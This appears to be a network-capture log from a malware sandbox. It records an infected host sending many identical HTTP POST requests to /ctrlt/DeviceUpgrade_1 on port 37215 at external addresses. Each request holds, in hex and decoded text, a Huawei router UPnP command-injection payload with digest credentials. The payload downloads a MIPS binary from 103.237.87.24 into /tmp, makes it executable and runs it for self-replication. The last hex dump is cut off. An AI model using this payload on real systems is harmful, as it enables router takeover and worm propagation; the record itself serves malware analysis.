                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  660192.168.2.1345988197.184.185.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303266048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  661192.168.2.135225496.183.248.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303268909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  662192.168.2.135954898.144.138.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303284883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  663192.168.2.134725441.191.141.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303291082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  664192.168.2.13486921.33.223.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303308010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  665192.168.2.1346772197.181.156.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303319931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  666192.168.2.1355750157.135.231.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303339958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  667192.168.2.135156041.216.1.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303358078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  668192.168.2.134456041.43.91.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303368092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  669192.168.2.1337862157.195.203.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.303373098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 